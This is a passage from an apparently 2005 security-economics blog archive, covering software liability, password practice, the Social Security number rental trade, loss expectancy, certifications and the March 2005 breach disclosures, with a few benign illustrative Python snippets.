    But the absence of a proper transfer contract did worry me from a liability point of view. So I wrote in that there was zero liability. And the discussions started ... it was during that discussion with the client that I realised that the reason I had written zero liability - leaving the client high and dry to fend with what could well have been buggy, incomplete, snake-oil nonsense written by a script kiddie, for all the client knew - was that if there was any liability, the price would have to go up.

    And, significantly! The price would skyrocket, because the mere presence of a letter from a lawyer would probably wipe out not only the profits from the job but the entire revenues (quick reality check: ask your lawyer what their retainer would be for a software liability action).

    So we - me as supplier, the client as user, and the entire industry - are faced with a choice. Either supply the product at price X and go with zero liability, or supply the product at price Y and assume some liability.

    What's the ratio between X and Y? For me it was at least double, probably more like 3-4 times. It's so significant that I know the client wouldn't pay, so they face a simple choice: either pay for no liability and get the security, or don't get the security work done at all.
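
    The back-of-envelope arithmetic behind that ratio runs something like this (all figures hypothetical): even a modest probability of a claim, multiplied by legal costs that dwarf the job's revenue, comes to dominate the price:

        # All figures hypothetical.
        price_no_liability = 10_000   # fee with liability disclaimed
        legal_retainer     = 100_000  # plausible cost of defending one action
        p_claim            = 0.10     # chance a client ever brings one
        loading            = 2        # insurer/overhead multiplier on the risk

        expected_liability = p_claim * legal_retainer  # 10,000
        price_with_liability = price_no_liability + loading * expected_liability
        print(price_with_liability / price_no_liability)  # 3.0, i.e. 3x the price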

    So what would happen if liability were added to software? Marcus suggests Microsoft Windows would go to $1000 per copy, citing the medical industry's experience. It's a number!

    Clearly Microsoft Windows would go up in price. Just as clearly, people would switch to open source product, which cannot as easily carry liability because there is no _for consideration_ contract, and their $1000 laptop would stay a $1000 laptop [1, 2]. And, as it happens, the secure Operating Systems are the BSDs, so not only would they suddenly find more popularity, we'd also get more security into the bargain as more people started to use these products, probably via the hard route of Linux, which would also be forced to get serious about security.

    This of course is the argument of the liability people - make software cope with its insecurity by properly pricing the cost of security such that it more correctly allocates society's resources. With the added wrinkle of open source of course. The problem with taking this path is that, no matter how desirable you find the notion of supporting open source, subsidies are a net 'bad' as an assumption in economics. That is, most every theory and study in economics shows that subsidies cost society more than they make. Which is to say that letting the market find the way to produce secure software is still a better bet than installing a permanent subsidy for open source into place.

    This market process may already be on the move, says Eric Marvets:

    [Microsoft's] marketing department is quietly getting ready and now all that's left is for the product to hit the market. These may all be coincidences, but I think it's a masterfully crafted business plan mid-execution.

    Microsoft is rejigging everything in place for a shift to a more security-oriented focus (quietly...).

    Will it work? Who knows. But one thing is clear - the market is pushing Microsoft in the direction of further security. What we need is happening, in the market. The question of whether regulators can do better is really a tough one, and experience and theory says No. So in promoting why adding liability would improve our net security, the question to ask is why it would work this time when the combined weight of economics and experience is against it?

    1. Open source suppliers can carry liability, but let's ignore the edge cases here.
    2. Countries with poorly developed intellectual property laws would still use Windows, as they also don't enter into contracts for consideration.

    Posted by iang at 09:56 AM | Comments (1) | TrackBack

    June 10, 2005

    New Best Practice for security: Avoid "Best Practices"

    I've written long and critically (including in a draft paper) about how "best practices" may actually oppose security rather than support it. Yes, there is a model that explains why best practices are bad. It appears that others may be coming to the same conclusion; here's a few snippets in that direction.

    1. "Best fit" is better fit. An otherwise routine article by Tan Shong Ye (Partner and Head of Security & Technology Practice at PricewaterhouseCoopers) suggests:

    It is becoming more common for organisations to strive for a "best fit" solution, as opposed to obtaining "best practice" in every security-related matter. Conforming to a set of best practices can be an extremely expensive exercise that does not necessarily deliver business benefits equal to or greater than the resources expended to get there.

    A best-fit model is, instead, about understanding what the risks are and applying the most appropriate risk mitigation strategy to reduce them, as opposed to applying best practice processes regardless of the associated risk.

    2. Write your passwords down! Another "best practice" looks like it is leaving us. Signs are that companies are finally starting to recommend that passwords be written down. Thank heavens for that. Slashdot reports that Netgear and Microsoft are doing it; they must have seen the blog (look at #4 to the right).

    Writing passwords down is common sense. If you have a dozen passwords, how elsewise are you going to remember them? And what happens when you don't remember them? You can't use the system! Which means admin time, help desk support time, your time, and sometimes your opportunity costs all kick in.

    Writing passwords down was banned back in the days when we each had one password only so we should be able to remember it. And, it helps to remember that the problem wasn't writing them down, it was pinning them to the very machine itself with big letters saying ACCOUNT PASSWORD ...

    All people have to do is hide it from view. That's all. Back in the days when I was a systems administrator I would carefully and obviously take all the root passwords, write them down on a piece of paper, put the paper into an envelope and seal it. Also sign all over the back. Finally I would pin the envelope on the boss's notice board where anyone could get it.

    I'd do this obviously and blatantly so that everyone in the office knew where to get them. And then I'd check every week to make sure it hadn't been opened.

    3. Don't outsource your soul to big companies. Smaller companies bemoan how large companies only buy from large security suppliers. Obviously, large security suppliers get stuck in large ruts. Buying from a large safe company may be a way to avoid having to learn the real risks, but it doesn't mean that you've covered those risks...

    4. And finally, Security is now the #1 concern of Financial Executives. So pay attention!

    Posted by iang at 05:57 PM | Comments (6) | TrackBack

    Virus-safe Computing - HP Labs article

    Mark Miller reports on a nice easy article from HP Labs. A must read!



    Check out the current cover story on the HP Labs web page!

    (For archival purposes, I also include here a direct link to Virus-safe computing.)

    Research on how to do safe operating systems is concentrated in the capabilities field, and this article is worth reading to get the flavour. The big challenge is how to get capabilities thinking into the mainstream product area, and the way the team has chosen to concentrate on securing Microsoft Windows programs has to be admired for the chutzpah!

    Allegedly, they've done it, at least in lab conditions. Can they take the capabilities and POLA approach and put it into the production world? I don't know, but the research is right up there at the top of the 'watch' list.

    Posted by iang at 08:01 AM | Comments (0) | TrackBack

    June 07, 2005

    Identity is an asset. Assets mean theft ... and Trade!

    This is a good article. It describes what happens when you make a simple number the core of your security system. If you control the number, it becomes valuable. If it becomes valuable then it will either be stolen or traded. Valuable things are assets - which means trade or theft. (See also EC.)

    In this case we see the trade, and this sits nicely alongside the identity theft epidemic in the US: all there because the system made the number the control.

    All security is based on assets. Perversely, if you make a number the core of your security system, then it becomes an asset, thus adding one more thing to protect, so you need a security system to secure your security system.

    The lesson is simple. Do not make your security depend on a number. Identify what the asset is and protect that. Don't protect stuff that isn't relevant, elsewise you'll find that the costs of protecting might skyrocket, while your asset walks off unprotected.
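
    One way to read that lesson in code: an identifier may select the record, but it must never double as the proof. A minimal sketch (hypothetical names throughout) that keeps the number as a mere index and puts the security in a separate secret:

        import hashlib, hmac, secrets

        accounts = {}  # public identifier -> (salt, key) held server-side

        def enroll(identifier: str, passphrase: str) -> None:
            salt = secrets.token_bytes(16)
            key = hashlib.pbkdf2_hmac("sha256", passphrase.encode(), salt, 100_000)
            accounts[identifier] = (salt, key)

        def authenticate(identifier: str, passphrase: str) -> bool:
            # The identifier only selects the record; knowing it proves nothing.
            if identifier not in accounts:
                return False
            salt, key = accounts[identifier]
            attempt = hashlib.pbkdf2_hmac("sha256", passphrase.encode(), salt, 100_000)
            return hmac.compare_digest(key, attempt)

        enroll("123-45-6789", "correct horse battery staple")
        print(authenticate("123-45-6789", "correct horse battery staple"))  # True
        print(authenticate("123-45-6789", "just knowing the number"))       # False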


    Some Immigrants Are Offering Social Security Numbers for Rent
    By EDUARDO PORTER

    Published: June 7, 2005

    TLALCHAPA, Mexico - Gerardo Luviano is looking for somebody to rent his Social Security number.

    Mr. Luviano, 39, obtained legal residence in the United States almost 20 years ago. But these days, back in Mexico, teaching beekeeping at the local high school in this hot, dusty town in the southwestern part of the country, Mr. Luviano is not using his Social Security number. So he is looking for an illegal immigrant in the United States to use it for him - providing a little cash along the way.

    "I've almost managed to contact somebody to lend my number to," Mr. Luviano said. "My brother in California has a friend who has crops and has people that need one."

    Mr. Luviano's pending transaction is merely a blip in a shadowy yet vibrant underground market. Virtually undetected by American authorities, operating below the radar in immigrant communities from coast to coast, a secondary trade in identities has emerged straddling both sides of the Mexico-United States border.

    "It is seen as a normal thing to do," said Luis Magana, an immigrant-rights activist assisting farm workers in the agriculture-rich San Joaquin Valley of California.

    The number of people participating in the illegal deals is impossible to determine accurately. But it is clearly significant, flourishing despite efforts to combat identity fraud.

    Hundreds of thousands of immigrants who cross the border from Mexico illegally each year need to procure a legal identity that will allow them to work in the United States. Many legal immigrants, whether living in the United States or back in Mexico, are happy to provide them: as they pad their earnings by letting illegal immigrants work under their name and number, they also enhance their own unemployment and pension benefits. And sometimes they charge for the favor.

    Martin Mora, a former migrant to the United States who these days is a local politician preparing to run for a seat in the state legislature in next October's elections, said that in just one town in the Tlalchapa municipality, "of about 1,000 that fixed their papers in the United States there might be 50 that are here and lending their number."

    Demand for American identities has blossomed in the cracks between the nation's increasingly unwelcoming immigration laws and businesses' unremitting demand for low-wage labor.

    In 1986, when the Immigration Reform and Control Act started penalizing employers who knowingly hired illegal immigrants, most employers started requiring immigrants to provide the paperwork - including a Social Security number - to prove their eligibility to work.

    The new law did not stop unauthorized immigrant work. An estimated 10 million illegal immigrants live in the United States today, up from some 4 million before the law went into effect. But it did create a thriving market for fake documents.

    These days, most immigrants working unlawfully buy a document combo for $100 to $200 that includes a fake green card and fake Social Security card with a nine-digit number plucked out of thin air. "They'll make it for you right there at the flea market," said David Blanco, an illegal immigrant from Costa Rica who works as an auto mechanic in Stockton, Calif.

    This process has one big drawback, however. Each year, Social Security receives millions of W-2 earning statements with names or numbers that do not match its records. Nine million poured in for 2002, many of them just simple mistakes. In response the agency sends hundreds of thousands of letters asking employers to correct the information. These letters can provoke the firing of the offending worker.

    Working with a name linked to a number recognized by Social Security - even if it is just borrowed or leased - avoids these pitfalls. "It's the safest way," said Mario Avalos, a Stockton accountant who every year does tax returns for dozens of illegal immigrants. "If you are going to work in a company with strict requirements, you know they won't let you in without good papers."

    While renting Social Security numbers makes up a small portion of the overall use of false papers, those with close ties to the immigrant communities say it is increasingly popular. "It used to be that people here offered their number for somebody to work it," said Mr. Mora in Tlalchapa. "Now people over there are asking people here if they can use their number."

    Since legal American residents can lose their green cards if they stay outside the country too long, for those who have returned to Mexico it is useful to have somebody working under their identity north of the border.

    "There are people who live in Mexico who take $4,000 or $5,000 in unemployment in the off season," said Jorge Eguiluz, a labor contractor working in the fields around Stockton, Calif. "They just lend the number during the season."

    The deals also generate cash in other ways. Most identity lending happens within an extended family, or among immigrants from the same hometown. But it is still a hard-nosed transaction. Illegal immigrant workers usually earn so little they are owed an income tax refund at the end of the year. The illegal immigrant "working the number" will usually pay the real owner by sharing the tax refund.

    "Sometimes the one who is working doesn't mind giving all the refund, he just wants to work," said Fernando Rosales, who runs a shop preparing income taxes in the immigrant-rich enclave of Huntington Park, Calif. "But others don't, and sometimes they fight over it. We see that all the time. It's the talk of the place during income tax time."

    Done skillfully, the underground transactions are virtually undetectable. They do not ring any bells at the Social Security Administration. Nor do they set off alarms at the Internal Revenue Service as long as the person who lends the number keeps track of the W-2's and files the proper income tax returns.

    In a written response to questions, the audit office of Social Security's inspector general acknowledged that "as long as the name and S.S.N. on an incoming wage item (i.e., W-2) matches S.S.A.'s record" the agency will not detect any irregularity.

    The response noted that the agency had no statistics on the use of Social Security numbers by illegal immigrants. It does not even know how many of the incorrect earnings reports it receives every year come from immigrants working unlawfully, though immigration experts estimate that most do.

    Meanwhile, with the Homeland Security Department focused on terrorism threats, it has virtually stopped policing the workplace for run-of-the-mill work violations. Immigration and Customs Enforcement arrested only 450 illegal immigrants in the workplace in 2003, down from 14,000 in 1998.

    "We have seen identity fraud," said John Torres, deputy assistant director for investigations. But "I haven't heard of the renting of identities."

    Immigrants on both sides of the transactions are understandably reluctant to talk about their participation.

    A 49-year-old illegal immigrant from Michoacan who earns $8.16 an hour at a waffle factory in Torrance, Calif., said that she had been using a Social Security number she borrowed from a friend in Mexico since she crossed illegally into the United States 15 years ago. "She hasn't come back in this time," the woman said.

    There are risks involved in letting one's identity be used by someone else, though, as Mr. Luviano, the beekeeping instructor, learned through experience.

    Mr. Luviano got his green card by a combination of luck and guile. He says he was on a short trip to visit his brother in California when the 1986 immigration law went into effect and the United States offered amnesty to millions of unauthorized workers.

    Three million illegal immigrants, 2.3 million of them from Mexico, ultimately received residence papers. Mr. Luviano, who qualified when a farmer wrote a letter avowing he had worked for months in his fields, was one. Once he had his papers, though, he returned to Tlalchapa.

    He has entered the United States several times since then, mostly to renew his green card. But in the early 1990's, concerned that long absences could put his green card at risk and spurred by the chance to make a little extra money, he lent his Social Security number to his brother's friend. "I kept almost all the income tax refund," Mr. Luviano said.

    Mr. Luviano decided to pull the plug on the arrangement, however, when bills for purchases he had not made started arriving in his name at his brother's address. "You lend your number in good faith and you can get yourself in trouble," he said.

    But Mr. Luviano is itching to do it again anyway. He knows that Social Security could provide retirement income down the line. And there's always the tax refund.

    "I haven't profited as much as I could from those documents," he said ruefully.

    Copyright 2005 The New York Times Company
    http://www.nytimes.com/2005/06/07/business/07immigrant.html

    Posted by iang at 09:51 AM | Comments (5) | TrackBack

    May 27, 2005

    Loss Expectancy in NPV calculations

    Mr WiKiD does some hypothetical calculations to show that using some security solutions could cause more costs than benefits, as everything you add to your systems increases your chances of loss.

    Is that right? Yes, any defence comes with its own weaknesses. Further, defences combine to be stronger in some places and weaker in others.

    Building security systems is like tuning speaker systems (or exhaust mufflers on cars). Every time we change something, the sound waves move around so some strengths combine to give us better bass at some frequencies, but worse bass at others. If we are happy to accept the combination of waves at some frequencies and are suppressing the others through say heavy damping, then that's fine. If not we end up with a woefully misbalanced sound.

    Security is mostly done like that, but without worrying about where the weaknesses combine. That's probably because the set of ears listening to our security isn't ours; it's the attacker's.

    So, getting back to WiKiD's assumptions, he added the Average Annual Loss Expectancy (AALE) into his NPV (Net Present Value) calculations, and because this particular security tool had a relatively high breach rate, the project went strongly negative.
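
    The shape of that calculation is worth a sketch (all figures hypothetical): the loss expectancy of the tool itself is just another negative cash flow, and a high breach rate sinks the project:

        def npv(rate, cashflows):
            # Net present value; cashflows[0] is the up-front (year 0) flow.
            return sum(cf / (1 + rate) ** t for t, cf in enumerate(cashflows))

        benefit_per_year = 40_000   # fraud the tool is expected to prevent
        run_cost         = 15_000   # licences and administration
        breach_rate      = 0.20     # chance per year the tool itself is breached
        breach_cost      = 150_000  # cost of cleaning up such a breach
        aale             = breach_rate * breach_cost  # 30,000 per year

        yearly = benefit_per_year - run_cost - aale   # -5,000: already negative
        print(npv(0.10, [-50_000] + [yearly] * 5))    # roughly -69,000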

    Bummer. But he homes in on an interesting thought - we need much more information on what the Loss Expectancy is for every security tool. I muse on that hypothetically in a draft paper, and having written on what the results of such issues are, I can see an immediate issue: how are we going to list and measure the Loss Expectancy product by product, or even category by category?

    Posted by iang at 10:03 PM | Comments (2) | TrackBack

    America asks "Why us?"

    Adam points to something I've been stating for a year or more now: why is the current security crisis happening in the USA and not elsewhere? So asks a nervous troll on Bruce Schneier's blog:

    This isn't intended as a troll, but why is it that we never hear about this sort of problem in Europe? Is it because we simply don't hear about overseas breaches, or do the European consumer and personal privacy laws seem to be working? How radical a rethink of American buisness practices would be required if we _really_ did own our personal data....

    Posted by: Anonymous at May 24, 2005 09:41 AM

    Go figure. If you need to ask the question, then you're half way to the answer - start questioning the crap that you are sold as security, rights to easy credit, and all the other nonsense that sellers thrust down consumers' throats. Stop accepting stuff just because it sounds good or because the guy has a good reputation - why on earth does any sane person think that a social security number is likely to protect a credit system?

    Adam also points to an article in which Richard Clarke, one-time White House cybersecurity adviser, points out that we should plan for failure. Yes indeed. Standard systems practice! Another thing you shouldn't accept is that you just got offered a totally secure product.

    With most of the nation's critical infrastructure owned by private companies, part of the onus falls to companies' C-level executives to be more proactive about security. "The first thing that corporate boards and C-level officials have to accept is that they will be hacked, and that they are not trying to create the perfect system, because nobody has a perfect system," he says.

    In the end, hackers or cyberterrorists wanting to infiltrate any system badly enough will get in, says Clarke. So businesses must accept this and design their systems for failure. This is the only sure way to stay running in a crisis. It comes down to basic risk management and business continuity practices.

    "Organizations have to architect their system to be failure-tolerant and that means compartmentalizing the system so it doesn't all go down... and they have to design it in a way that it's easy to bring back up," he says.

    Relying too heavily on perimeter security and too little on additional host-based security will fall short, says Clarke. Organizations, both public and private, need to be much more proactive in protecting their networks from internal and external threats. "They spend a lot of money thinking that they can create a bullet-proof shield," he says. "So they have these very robust perimeters and nothing on the inside."

    It's a long article, the rest is full of leadership/proactive/blah blah and can be skipped.

    And Stefan rounds out today's grumbles with one about one more security product in a long list of them. In this case, IBM has (as Stefan claims) a simplistic approach - hash it all before sharing it. Nah, won't work, and won't scale.

    Even IBM's notions of salting the hashes won't work, as the Salt becomes critical data. And once that happens, ask what happens to your database if you were to reinstall and lose the Salt? Believe me, it ain't pretty!
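
    The Salt problem is easy to see in a sketch (a hypothetical scheme, not IBM's actual design): records only match while everyone hashes with the same salt, so the salt becomes a long-lived secret in its own right. Regenerate it after a reinstall and every stored hash is orphaned:

        import hashlib, hmac

        SALT = b"site-wide secret salt"  # now critical data in its own right

        def share_token(record_id: str) -> str:
            # Keyed hash of the identifier, meant to be safe to share.
            return hmac.new(SALT, record_id.encode(), hashlib.sha256).hexdigest()

        before = share_token("123-45-6789")

        # After a reinstall with a regenerated salt, nothing matches any more:
        SALT = b"regenerated after reinstall"
        after = share_token("123-45-6789")
        print(before == after)  # False - the shared database is now useless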

    Posted by iang at 02:49 PM | Comments (0) | TrackBack

    May 11, 2005

    FUDWatch - VoIP success attracts the security parasites

    VoIP has been an unmitigated success, once Vonage and Skype sorted out the basic business models that their predecessors (remember SpeakFreely, PGPFone?) did not get right. And everyone loves a story of connivance and hacker attacks. Now the security industry is ramping up to create Fear, Uncertainty and Doubt - better known as FUD - in the VoIP industry.

    "As VoIP is rolled out en masse, we're going to see an increased number of subscribers and also an increased number of attackers," says David Endler, chairman of the VoIP Security Alliance (VOIPSA), a recently formed industry group studying VoIP security.

    Consider FUD as the enabler for a security tax. We can't of course collect the revenues we deserve unless the public fully understands what dangers they are in, surely? Right? Consider these past disastrous precedents:

    The VoIP experience could parallel the Wi-Fi example. As Wi-Fi began to gain momentum a few years ago, an increasing number of vulnerabilities came to light. For example, unencrypted wireless traffic could be captured and scanned for passwords, and wireless freeloaders took advantage of many early networks that would let anyone sign in. At first, Endler says, only the technological elite could take advantage of security holes like these. But before long the "script kiddies"--those who lack the skills to discover and exploit vulnerabilities on their own, but who use the tools and scripts created by skilled hackers--joined in.

    Kick me for being asleep, but that's another FUD case right there. The Wi-Fi evolution has been one of overwhelming benefit to the world, and even in the face of all these so-called vulnerabilities, actual bona fide verified cases of losses are as rare as hen's teeth.

    In all seriousness, we've been through a decade of Internet security now and it's well past time to grow up and treat security as an adult subject. What's the threat? Someone's listening to your phone call? Big deal, get an encrypted product like Skype. Someone's DOSing your router? Wait until they go away.

    There just doesn't seem to be an economic model behind these threats. We know that phishing and spam are fundamentally economic. We know that cracking boxes was originally for fun and education, and is now in support of phishing and spam. Hacking and cracking aside, as exceptions to the economic motive, there has to be a motive, and listening in to random people's phone calls just doesn't cut it.

    Addendum. Ohmygawd, it gets worse: Congress is asked to protect the Internet for VoIP. Hopefully they are busy that day. Hmm, looks like the wire services have censored it. Try this PDF.

    Posted by iang at 08:30 AM | Comments (3) | TrackBack

    May 03, 2005

    Security as a "Consumer Choice" model or as a sales (SANS) model?

    In thoughts about how to do Internet security - something the world fails at dismally for the present time - it is sometimes suggested that a "consumer choice" model would work. This model sets up independent non-profit organisations that conduct unbiased reports on products. They promulgate strict rules designed to ensure their independence, such as the separation of advertising revenue or even not taking money for advertising at all. (Will's history lesson)

    By way of example, in today's Lighthouse, The Independent Institute suggests that the american Food and Drug Administration ("FDA") should be replaced with this model:

    "If aspirin were invented today, the U.S. Food and Drug Administration might not approve it. We should keep this in mind when thinking about Vioxx, Bextra and other pain-relief drugs that have recently been taken off the market. This is not to say that the new pharmaceuticals are “safe,” but rather that all pharmaceuticals involve tradeoffs. The real question is: who is to make those tradeoffs, patients and doctors or the FDA?"

    There are already plenty of security groups and more pop up every year, but they are generally platforms for sales. SANS for instance just released an update for its top 20 threats (but still doesn't mention phishing as a threat, confirming its status as a dinosaur).

    From historical pre-Internet times, the list divides the threats into a top 10 list for Microsoft and a top 10 for Unix. Reading the Microsoft list gives the overwhelming impression that it is sanitised and softened. The clue is the use of brand - when being critical, the wrong terminology is used. So, we find that "Windows" has a bug, which aside from confusing me as to whether my X Windows or my KDE windows or Mac's windows have an issue, avoids the obviously harsher connotations of the correct brand of "Microsoft Windows."

    Why? Fear of offending companies. SANS is really a seller of conferences, as one can see from the front page, it is not an independent security organisation. And conferences are attended by companies, not by individuals. Better not offend a very large company then.

    Which brings up the problem with the "consumer choice" model - what is the revenue model? How are all these reports to be funded? Thinking about the old model, magazine sales created the revenue, but that doesn't work today because the net operates at zero marginal cost.

    So maybe we need to turn to net models of cooperation, and create an open source-like culture of security reports? Would it be possible to craft a set of criteria for security reports where the product was covered by Creative Commons licence, any group could create one and a few volunteers sit in the middle and mentor and collate?

    An intriguing thought. People are doing the work anyway; why not publish it and share the benefit? Throw in a reputation system to stop Microsoft from inserting their own "SANS report" and we're away. Would it work? I don't know, but it's at least worth a second cup of coffee.

    Addendum: the comments below remind me of Will's history lesson. Well worth reviewing as it sets the scene for the wider discussion.

    #2 Whoops, spoke too soon. The press release from SANS actually uses the proper brand names and gives Microsoft a bad rep. Good one!

    Posted by iang at 06:17 AM | Comments (5) | TrackBack

    April 07, 2005

    Cubicle adds to Security Research on Skype

    Cubicle packaged up the available analysis on Skype and came up with a bunch of risks which the spreading VoIP app imposes on the poor corporate victims of free telecoms. The bottom line was that the risks remain low, although Cubicle didn't say that. Score 3 points for Jedi Knights of the Crypto Rebellion, taking their score to 4.

    I said more about how low risk Skype is to security a while back (click on Jedi above), and stirred up a storm of controversy. That's because I treat security in a statistical and opportunistic fashion: if it improves the situation then that's ... an improvement. That's good, by definition. If it ain't there, that's not an improvement, by definition. So if you don't use a crypto product because it has some unvalidated weakness, then by definition you have reduced your security. That's bad.

    The really great news is that if Cubicle and others can find a problem and actually validate a risk, then Skype will probably fix it, and that'll be yet another improvement, right there! Our cup runneth over! Go Cubicle!

    Addendum: reading late last night, and now that I've actually read one article, there is a risk pointed to there, which is that Skype could be used to deliver spyware, and apparently the Kazaa cousins were already spotted doing that... One worth watching, but this remains an unvalidated risk. I haven't had time to read the other pdf yet.

    Posted by iang at 03:07 PM | Comments (3) | TrackBack

    March 30, 2005

    Security Signals - Schneier reviews Ciphire email system

    Poking around on Ciphire's website I discovered a review by Bruce Schneier on the architecture. It follows on from an earlier one by Russ Housley and Niels Ferguson. Here are some meta-comments on the second review.

    Firstly, Bruce indicates that the system is vulnerable to an MITM based on the attacker attempting to insert false reply information, and then redirecting the user to email back to an address/key he happens to have. Bruce says this is hard to deal with, but I wonder about that: this is what SSH defends against. If the client can keep track of the certs it has downloaded, surely it should be able to warn of changes, either by history tracking or user labelling (petnames, logos etc). Indeed, it seems that a lot of the other later attacks can be dealt with by not trusting the PKI every time it says "trust me."
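
    What SSH defends with is key continuity - trust on first use, then scream on change. A minimal sketch of the same idea applied to correspondents' keys (addresses and fingerprints hypothetical):

        known_keys = {}  # correspondent address -> fingerprint seen first

        def check_continuity(address: str, fingerprint: str) -> str:
            # SSH-style key continuity: trust on first use, warn on change.
            if address not in known_keys:
                known_keys[address] = fingerprint
                return "first contact: remembering this key"
            if known_keys[address] == fingerprint:
                return "same key as before"
            return "WARNING: key changed - possible MITM, ask the user"

        print(check_continuity("alice@example.com", "ab:cd:ef"))  # first contact
        print(check_continuity("alice@example.com", "ab:cd:ef"))  # same key
        print(check_continuity("alice@example.com", "12:34:56"))  # WARNING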

    Secondly, Bruce talks about the insider code injection attack. Yes, tough one. Publishing the code - which Ciphire have indicated they will do - helps there, and as mentioned this is _necessary but not sufficient_, as eyeballs are limited even then.

    But there are further steps that will be left undone - Open Sourcing, Open Standards and Open Competition. Open source walks hand in hand with open standards. And open standards encourage competing implementations. Here, we see the often bitter and twisted relationship between the PGP Inc and GnuPG teams - which we cheer and applaud, as while they fight each other, their code gets better and better, and more and more secure.

    No such luck for Ciphire; even when they publish the source, it would take a masochist of maniacal proportions to download it, print it and start reading it. I well remember Lucky Green walking into HIP with boxes and boxes of PGP source. And I do mean boxes, a figure of 20 sticks in my mind and I have no idea why. A team of about a dozen of us worked for about 2 days flat out to finish the last 1% of the errors in the source scanning. And we didn't have time to dally on this comment or that buffer overflow...

    So Ciphire aren't going to see as much benefit from the publication of their source as they might hope, but for all that it certainly adds to the confidence if they do publish.

    Thirdly, what's the _security signal_ with posted reviews? Well, it's all well and good that someone famous did a review. That's presumably for money, and any crypto guy knows you get what you pay for. That's grand, but what strikes me is not the review, but the problems found. Problems were found - see above - and Ciphire still printed the review!

    So I propose a new signal: disclosure of own shortfalls, weaknesses, attacks. As Ciphire has gone ahead and published a critique with lines of attack within it, they've drawn out the worst that can happen to them. This does more than just give slashdotters something to get excited over, it actually tells the world where the security stops. That's a valuable thing.

    Posted by iang at 02:15 AM | Comments (2) | TrackBack

    March 29, 2005

    Security Signals - Certifications for Experts

    Some people swear by them. Others think they are just paper. What are they really? I am reminded of the Stigler observation that, paraphrased, all certifications are eventually taken over by their stakeholders. Here is a Register article that bemoans one such certification dropping its practical test, reducing it to boot camp / brain dump status.

    I have no certifications, and I can declare myself clearly on this: given what I already know, it would be uneconomic to obtain one. Frankly, it is always better to study something you know little of (like an MBA) than something you already know a lot of (like how to build a payment system - the pinnacle of security problems because, unlike other areas, you are guaranteed to have real threats).

    I recently looked at CISSP (as described in the above article). With some hope, I downloaded their PDF, after tentatively signing my life away because of their fear of revealing their deepest security secrets to some potential future student. Yet what was in the PDF was ... less than in any reasonable half-dozen articles in any net rag with security in their name. Worse, the PDF finishes with a 2 or 3 page list of references with no organisation and no hope of anyone reading or even finding more than a few of them.

    So in contrast to what today's article suggests, CISSP is already set up as a funnel for revenue purposes. When a certification draws you in to purchase the expensive training materials, then you know they are on the road to the degree mills, simply because security is no longer their single goal. Now they have a revenue incentive ... It's only a matter of time before they forget their original purpose.

    Which all leads to the other side of the coin - if an employer is impressed by your certification, then that employer hasn't exactly thought it through. Not so impressive in return; do you really want to do security work for an organisation that has already reduced its security process to one of borrowing other organisations' best practices? (Which leads to the rather difficult question of how to identify an organisation that thinks for itself in security matters. Another difficult problem in security signalling!)

    So what does an employer do to find out if someone knows any security? How does an _individual_ signal to the world that he or she knows something about the subject? Another question, another day!

    Posted by iang at 11:29 AM | Comments (6) | TrackBack

    March 28, 2005

    Mad March of Disclosures - the post-Choicepoint world

    Until recently, security breaches were generally hushed up. A California law (SB1386) requiring notification of victims when identity information is lost was passed in 2002 and came into effect mid-2003, which had the effect of springing a mandated leak in the secrecy of breaches across corporate and government USA.

    At first a steady trickle of smaller breaches garnered minor press attention. Then Choicepoint burst into the public consciousness in February of 2005 due to several factors. This major breach not only caused a major dip in the company's share price, but also triggered the wave of similar revelations (see ID theft is inescapable below for a long list).

    Such public exposure of breaches is unprecedented. Either we have just observed a spike in actual breaches and this is truly Mad March, or the breaches are normal, but the disclosure is abnormal.

    Anecdotal evidence in the security industry supports the latter theory. (One example.) We've always known that massive breaches were happening, as stories have persistently circulated in security circles ever since companies started hooking databases to Internet servers. I feel pretty darn safe in putting the finger on SB1386 and Choicepoint as having changed the way things are now done (and, not to forget Schechter and Smith's FC03 paper which argued for more disclosure).

    (Editorial note: this is posted because I need a single reference to the list of disclosures, rather than a squillion URLs. As additional disclosures come in I might simply add them to the list. For a comprehensive list of posts, see Adam's Choicepoint category. Adam also points at David Fraser's list of privacy incidents. And another list.)


    ID theft is inescapable

    By Thomas C Greene in Washington
    Published Wednesday 23rd March 2005 12:29 GMT

    March 2005 might make history as the apex of identity theft disclosures. Privacy invasion outfit ChoicePoint, payroll handler PayMaxx, Bank of America, Lexis Nexis, several universities, and a large shoe retailer called DSW all lost control of sensitive data concerning millions of people.

    Credit card and other banking details, names, addresses, phone numbers, Social Security numbers, and dates of birth have fallen into the hands of potential identity thieves. The news could not be worse.

    In March 2005 alone:

    California State University at Chico notified 59,000 students, faculty, and staff that their details had been kept on a computer compromised by remote intruders. The haul included names, addresses and Social Security numbers.

    Boston College notified 120,000 of its alumni after a computer containing their addresses and Social Security numbers was compromised by an intruder.

    Shoe retailer DSW notified more than 100,000 customers of a remote break-in of the company's computerized database of 103 of the chain's 175 stores.

    Privacy invasion outfit Seisint, a contributor to the MATRIX government dossier system, now owned by Reed Elsevier, confessed to 32,000 individuals that its Lexis Nexis databases had been compromised.

    Privacy invasion outfit ChoicePoint confessed to selling the names, addresses and Social Security numbers of more than 150,000 people to criminals.

    Bank of America confessed to losing backup tapes containing the financial records of 1.2 million federal employees.

    Payroll outsourcer PayMaxx foolishly exposed more than 25,000 of its customers' payroll records on line.

    Desktop computers belonging to government contractor Science Applications International Corp (SAIC) were stolen, exposing the details of stockholders past and present, many of them heavy hitters in the US government, such as former Defense Secretaries William Perry and Melvin Laird, former CIA Director John Deutch, former CIA Deputy Director Bobby Ray Inman, former Chief Weapons Inspector in Iraq David Kay, and former chief counter-terror advisor General Wayne Downing.

    Cell phone provider T-Mobile admitted that an intruder gained access to 400 of its customers' personal information.

    George Mason University confessed that a remote intruder had gained access to the personal records of 30,000 students, faculty, and staff.

    To which we can add: Department of Homeland Security's Transportation Security Administration, Northwestern University's Kellogg School of Management, Nevada's Department of Motor Vehicles, legal data collector Westlaw, the University of Nevada, and the University of California, Berkeley.

    Posted by iang at 11:34 AM | Comments (3) | TrackBack

    March 25, 2005

    Overzealous sentencing leads to reduction in security

    Yet another disproportionate sentence was handed down for what amounts to a bunch of misdemeanours in the US of A. Adam reports, and Google has lots of articles, on a hacker who spent too much time cracking into various places. In the stated case, he abused access to a customer's site (so it wasn't hacking), and even the plea submission agreed he didn't do anything with the information:

    "Baas committed a crime when he exceeded his authorized access, looked for and downloaded an encrypted password file, and ran a password cracking program against the file,"
    ...
    The statement of facts says Baas illegally obtained about 300 passwords, including one that acted like a "master key" and allowed him to download files that belonged to other Acxiom customers. The downloaded files contained personal identification information. The data stolen by Baas was not used for criminal or commercial purposes.

